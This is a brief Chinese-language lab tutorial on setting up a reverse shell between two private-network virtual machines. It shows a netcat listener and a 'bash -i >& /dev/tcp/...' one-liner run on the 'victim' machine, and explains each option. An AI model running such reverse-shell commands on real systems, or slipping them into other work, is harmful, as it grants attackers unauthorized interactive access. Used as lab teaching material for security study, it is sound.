1. 实验条件:
两台unix虚拟机:
* Ubuntu:192.168.220.16
* Centos: 192.168.220.4
Centos:
本地监听:
* nc -lvp 6767
Ubuntu:
受害端生成反弹shell
:
bash -i>&/dev/tcp/192.168.220.4/6767 0>&1
解释:
- nc -lvp 6767
-l监听 -v输出交互或出错的信息,-p端口。nc是netcat的缩写,可实现任意TCPUDP端口的帧听
- bash -i
-i interactive.即产生一个交互式shell(bash).
- /dev/tcp/IP/PORT
特殊设备文件(Linux文件),打开这个文件就相当于发出了一个socket调用并建立一个socket连接,读写这个文件就相当于在这个socket连接中传输数据。